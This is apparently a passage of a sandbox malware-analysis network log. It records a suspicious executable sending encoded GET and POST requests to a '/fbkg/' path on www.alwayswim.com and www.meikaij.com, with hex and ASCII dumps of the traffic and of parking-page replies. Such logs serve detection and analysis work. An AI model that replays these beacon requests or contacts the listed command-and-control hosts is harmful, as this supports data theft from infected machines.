                                                                                                                                                                                                Nov 17, 2023 19:30:32.483627081 CET1024OUTData Raw: 58 34 6e 77 4d 4b 4e 6d 4e 73 69 5a 6d 61 45 69 65 62 77 66 45 56 41 44 4e 7a 38 70 52 49 51 48 70 4d 37 76 4a 48 55 32 71 39 41 72 70 66 62 6b 63 54 52 78 65 43 47 44 55 6d 68 6b 49 33 39 4f 7a 43 62 76 48 6c 5a 48 71 6b 62 78 68 54 63 6c 6c 79
                                                                                                                                                                                                Data Ascii: X4nwMKNmNsiZmaEiebwfEVADNz8pRIQHpM7vJHU2q9ArpfbkcTRxeCGDUmhkI39OzCbvHlZHqkbxhTcllyI7UuoiEaS5kVjdO2cyHiZg0cmr1EFhzN7uYATMsGkTW2sxJRNIHjC7ky9k91Vgf0epayNXeYN7f348Xn8ngLVXHF3S1v1+OWRkz32q/5uvpv3kmCV3MWeYOskwh2slai6UY6oawbEGIu+4VG4F1wWouaYm4g9VqK8
                                                                                                                                                                                                Nov 17, 2023 19:30:32.524153948 CET1027OUTData Raw: 74 66 6e 36 52 62 55 2f 79 35 36 79 44 35 33 78 6a 62 32 33 6d 61 4e 42 32 61 49 78 55 43 4f 6c 79 61 4b 53 4d 69 4d 46 77 4e 31 6b 63 45 67 69 57 2f 31 59 44 46 4b 6d 36 56 4b 54 48 34 6b 53 4b 64 39 45 6b 78 30 32 49 76 52 48 4d 56 64 75 59 79
                                                                                                                                                                                                Data Ascii: tfn6RbU/y56yD53xjb23maNB2aIxUCOlyaKSMiMFwN1kcEgiW/1YDFKm6VKTH4kSKd9Ekx02IvRHMVduYyI1nIGhBiQVj732wmEJl3N9CI61hTKWRC85SqS7aOnN2Qd9DaCDUlNdGt6CeZduQy+DCPzUEp9tww8Zgr/feNUferVIkWSiU21fOCIpL77fSiLpv20JfpJ/Oh40/U4NFbdM4CrGgmlQxqHyHAoDVi6v5dEw7zQrWQj
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624094963 CET1029OUTData Raw: 30 64 7a 43 52 64 2b 44 37 78 50 39 68 35 6e 6b 78 6a 4c 4c 70 57 6a 61 6d 4a 5a 56 56 43 64 33 50 54 30 58 53 72 51 47 62 4f 70 32 56 6d 45 66 67 51 39 72 51 71 4d 68 57 6f 6d 38 4b 43 64 76 57 6a 59 32 48 72 4a 51 73 57 63 47 79 4c 66 77 36 6c
                                                                                                                                                                                                Data Ascii: 0dzCRd+D7xP9h5nkxjLLpWjamJZVVCd3PT0XSrQGbOp2VmEfgQ9rQqMhWom8KCdvWjY2HrJQsWcGyLfw6lVr4lRL5+8eNa/Gu4k1T5fxG5CjPyKabGTxbXlchZFEQHe4vgTseJELnx0tDEMLajTIG3pteZC9fFR30W0INy8gZBGHvxCbmERwzxoWd2e3IQdWbvNdbhTCYNhiGD+ZQHGWkqWo/L9yi3y0N1VH9D9vyV/x0vXMq8s
                                                                                                                                                                                                Nov 17, 2023 19:30:32.624237061 CET1033OUTData Raw: 31 78 49 76 65 43 67 36 48 76 44 2f 36 46 33 79 2f 6f 77 71 57 2f 36 59 41 6a 68 55 73 78 64 59 65 6f 58 58 51 46 77 75 73 6b 6f 2b 72 42 43 59 4e 36 45 5a 33 73 68 70 46 2b 6a 32 67 52 70 39 4d 44 45 52 7a 47 2b 30 79 4b 6f 4b 6e 6e 38 57 71 44
                                                                                                                                                                                                Data Ascii: 1xIveCg6HvD/6F3y/owqW/6YAjhUsxdYeoXXQFwusko+rBCYN6EZ3shpF+j2gRp9MDERzG+0yKoKnn8WqDBGi+lcwdO0+X10DssxkfjdVZhMpEMYWJw6+J62C7rmBHayVjIesMu+VjE8HURITTYUDxtE2nNCVMIh0/Z8cW6SNq4J6HFV9fUB/3AF0TxA3NCPO3dpAuZ76kgAWh/U/IFVMpCyevgAPyFx6AL1i0+ItY8mqljBMn+


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                4645.33.23.18380192.168.11.2050173C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:35.012530088 CET1044OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=NPALKBz6tnWwrGvL1qkXou5DT6PdsmzVmJQ0dMJxOdiepQUGM57E+42rms1x66Gf0nUj851MdR/onhYOJHuQNwzuR569J9mC8A== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.alwayswim.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:30:35.156433105 CET1045INHTTP/1.1 200 OK
                                                                                                                                                                                                server: openresty/1.13.6.1
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:35 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 33 44 41 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 61 6c 77 61 79 73 77 69 6d 2e 63 6f 6d 2f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 61 6c 77 61 79 73 77 69 6d 2e 63 6f 6d 2f 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 64 6f 5f 6f 6e 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 64 6f 5f 6f 6e 6c 6f 61 64 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6c 77 61 79 73 77 69 6d 2e 63 6f 6d 2f 66 62 6b 67 3f 67 70 3d 31 26 6a 73 3d 31 26 75 75 69 64 3d 31 37 30 30 32 34 35 38 33 35 2e 30 30 32 32 39 38 35 33 39 31 26 6f 74 68 65 72 5f 61 72 67 73 3d 65 79 4a 31 63 6d 6b 69 4f 69 41 69 4c 32 5a 69 61 32 63 69 4c 43 41 69 59 58 4a 6e 63 79 49 36 49 43 4a 4f 65 44 46 4d 4d 54 30 31 4d 6a 5a 6b 5a 32 78 66 63 47 68 4b 4a 6c 51 32 53 54 31 4f 55 45 46 4d 53 30 4a 36 4e 6e 52 75 56 33 64 79 52 33 5a 4d 4d 58 46 72 57 47 39 31 4e 55 52 55 4e 6c 42 6b 63 32 31 36 56 6d 31 4b 55 54 42 6b 54 55 70 34 54 32 52 70 5a 58 42 52 56 55 64 4e 4e 54 64 46 4b 7a 51 79 63 6d 31 7a 4d 58 67 32 4e 6b 64 6d 4d 47 35 56 61 6a 67 31 4d 55 31 6b 55 69 39 76 62 6d 68 5a 54 30 70 49 64 56 46 4f 64 33 70 31 55 6a 55 32 4f 55 6f 35 62 55 4d 34 51 54 30 39 49 69 77 67 49 6e 4a 6c 5a 6d 56 79 5a 58 49 69 4f 69 41 69 49 69 77 67 49 6d 46 6a 59 32 56 77 64 43 49 36 49 43 49 71 4c 79 6f 69 66 51 3d 3d 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 3DA<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.alwayswim.com/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.alwayswim.com/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.alwayswim.com/fbkg?gp=1&js=1&uuid=1700245835.0022985391&other_args=eyJ1cmkiOiAiL2Zia2ciLCAiYXJncyI6ICJOeDFMMT01MjZkZ2xfcGhKJlQ2ST1OUEFMS0J6NnRuV3dyR3ZMMXFrWG91NURUNlBkc216Vm1KUTBkTUp4T2RpZXBRVUdNNTdFKzQycm1zMXg2NkdmMG5Vajg1MU1kUi9vbmhZT0pIdVFOd3p1UjU2OUo5bUM4QT09IiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICIqLyoifQ=="; } </script> </body></html>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                46192.168.11.205017345.33.23.18380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:35.012530088 CET1044OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=NPALKBz6tnWwrGvL1qkXou5DT6PdsmzVmJQ0dMJxOdiepQUGM57E+42rms1x66Gf0nUj851MdR/onhYOJHuQNwzuR569J9mC8A== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.alwayswim.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:30:35.156433105 CET1045INHTTP/1.1 200 OK
                                                                                                                                                                                                server: openresty/1.13.6.1
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:35 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 33 44 41 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 61 6c 77 61 79 73 77 69 6d 2e 63 6f 6d 2f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 61 6c 77 61 79 73 77 69 6d 2e 63 6f 6d 2f 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 64 6f 5f 6f 6e 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 64 6f 5f 6f 6e 6c 6f 61 64 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6c 77 61 79 73 77 69 6d 2e 63 6f 6d 2f 66 62 6b 67 3f 67 70 3d 31 26 6a 73 3d 31 26 75 75 69 64 3d 31 37 30 30 32 34 35 38 33 35 2e 30 30 32 32 39 38 35 33 39 31 26 6f 74 68 65 72 5f 61 72 67 73 3d 65 79 4a 31 63 6d 6b 69 4f 69 41 69 4c 32 5a 69 61 32 63 69 4c 43 41 69 59 58 4a 6e 63 79 49 36 49 43 4a 4f 65 44 46 4d 4d 54 30 31 4d 6a 5a 6b 5a 32 78 66 63 47 68 4b 4a 6c 51 32 53 54 31 4f 55 45 46 4d 53 30 4a 36 4e 6e 52 75 56 33 64 79 52 33 5a 4d 4d 58 46 72 57 47 39 31 4e 55 52 55 4e 6c 42 6b 63 32 31 36 56 6d 31 4b 55 54 42 6b 54 55 70 34 54 32 52 70 5a 58 42 52 56 55 64 4e 4e 54 64 46 4b 7a 51 79 63 6d 31 7a 4d 58 67 32 4e 6b 64 6d 4d 47 35 56 61 6a 67 31 4d 55 31 6b 55 69 39 76 62 6d 68 5a 54 30 70 49 64 56 46 4f 64 33 70 31 55 6a 55 32 4f 55 6f 35 62 55 4d 34 51 54 30 39 49 69 77 67 49 6e 4a 6c 5a 6d 56 79 5a 58 49 69 4f 69 41 69 49 69 77 67 49 6d 46 6a 59 32 56 77 64 43 49 36 49 43 49 71 4c 79 6f 69 66 51 3d 3d 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 3DA<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.alwayswim.com/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.alwayswim.com/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.alwayswim.com/fbkg?gp=1&js=1&uuid=1700245835.0022985391&other_args=eyJ1cmkiOiAiL2Zia2ciLCAiYXJncyI6ICJOeDFMMT01MjZkZ2xfcGhKJlQ2ST1OUEFMS0J6NnRuV3dyR3ZMMXFrWG91NURUNlBkc216Vm1KUTBkTUp4T2RpZXBRVUdNNTdFKzQycm1zMXg2NkdmMG5Vajg1MU1kUi9vbmhZT0pIdVFOd3p1UjU2OUo5bUM4QT09IiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICIqLyoifQ=="; } </script> </body></html>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                47199.59.243.22580192.168.11.2050174C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:40.372844934 CET1046OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.meikaij.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.meikaij.com
                                                                                                                                                                                                Referer: http://www.meikaij.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 74 74 4a 34 2b 7a 56 63 6f 5a 6a 69 4b 50 4e 50 6e 43 42 37 78 66 54 50 30 70 4e 42 74 62 5a 7a 6f 34 6a 54 44 35 39 56 76 66 2b 4d 53 4e 68 51 44 53 73 6f 42 6e 6e 6d 6e 53 49 35 78 46 79 71 76 54 5a 71 4d 41 67 49 5a 64 49 6c 71 4b 47 70 2f 31 63 78 63 77 72 6e 38 45 6d 76 68 42 4d 76 4b 6a 63 35 51 2f 58 78 30 57 57 64 4b 54 79 35 7a 46 51 42 55 71 64 50 30 5a 69 2b 51 49 53 4d 35 5a 47 74 52 2f 78 36 74 48 70 33 38 6f 39 66 6e 50 53 69 6e 74 39 65 70 38 47 76 48 43 31 47 4b 4b 54 38 46 37 4d 2b 6a 6d 2b 73 31 5a 41 43 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=EttJ4+zVcoZjiKPNPnCB7xfTP0pNBtbZzo4jTD59Vvf+MSNhQDSsoBnnmnSI5xFyqvTZqMAgIZdIlqKGp/1cxcwrn8EmvhBMvKjc5Q/Xx0WWdKTy5zFQBUqdP0Zi+QISM5ZGtR/x6tHp38o9fnPSint9ep8GvHC1GKKT8F7M+jm+s1ZACg==
                                                                                                                                                                                                Nov 17, 2023 19:30:40.487772942 CET1047INHTTP/1.1 200 OK
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:39 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                content-length: 1085
                                                                                                                                                                                                x-request-id: f246c616-71bc-4fef-9cdc-97cc14a32ca8
                                                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==
                                                                                                                                                                                                set-cookie: parking_session=f246c616-71bc-4fef-9cdc-97cc14a32ca8; expires=Fri, 17 Nov 2023 18:45:40 GMT; path=/
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 6d 6a 51 65 33 65 67 39 75 33 63 62 6a 38 38 74 55 4e 4f 37 67 66 57 30 34 2f 51 46 51 5a 76 6c 73 74 4c 6a 76 59 53 44 6a 37 75 73 55 51 65 45 59 33 66 68 34 64 4f 37 34 4d 45 43 54 66 61 4b 31 62 57 36 45 57 77 2f 63 59 77 75 45 45 58 65 56 71 37 73 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                                                                                                Nov 17, 2023 19:30:40.487910032 CET1048INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                                                                                                Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjI0NmM2MTYtNzFiYy00ZmVmLTljZGMtOTdjYzE0YTMyY2E4IiwicGFnZV90aW1lIjoxNzA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                47192.168.11.2050174199.59.243.22580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:40.372844934 CET1046OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.meikaij.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.meikaij.com
                                                                                                                                                                                                Referer: http://www.meikaij.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 74 74 4a 34 2b 7a 56 63 6f 5a 6a 69 4b 50 4e 50 6e 43 42 37 78 66 54 50 30 70 4e 42 74 62 5a 7a 6f 34 6a 54 44 35 39 56 76 66 2b 4d 53 4e 68 51 44 53 73 6f 42 6e 6e 6d 6e 53 49 35 78 46 79 71 76 54 5a 71 4d 41 67 49 5a 64 49 6c 71 4b 47 70 2f 31 63 78 63 77 72 6e 38 45 6d 76 68 42 4d 76 4b 6a 63 35 51 2f 58 78 30 57 57 64 4b 54 79 35 7a 46 51 42 55 71 64 50 30 5a 69 2b 51 49 53 4d 35 5a 47 74 52 2f 78 36 74 48 70 33 38 6f 39 66 6e 50 53 69 6e 74 39 65 70 38 47 76 48 43 31 47 4b 4b 54 38 46 37 4d 2b 6a 6d 2b 73 31 5a 41 43 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=EttJ4+zVcoZjiKPNPnCB7xfTP0pNBtbZzo4jTD59Vvf+MSNhQDSsoBnnmnSI5xFyqvTZqMAgIZdIlqKGp/1cxcwrn8EmvhBMvKjc5Q/Xx0WWdKTy5zFQBUqdP0Zi+QISM5ZGtR/x6tHp38o9fnPSint9ep8GvHC1GKKT8F7M+jm+s1ZACg==
                                                                                                                                                                                                Nov 17, 2023 19:30:40.487772942 CET1047INHTTP/1.1 200 OK
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:39 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                content-length: 1085
                                                                                                                                                                                                x-request-id: f246c616-71bc-4fef-9cdc-97cc14a32ca8
                                                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==
                                                                                                                                                                                                set-cookie: parking_session=f246c616-71bc-4fef-9cdc-97cc14a32ca8; expires=Fri, 17 Nov 2023 18:45:40 GMT; path=/
                                                                                                                                                                                                connection: close
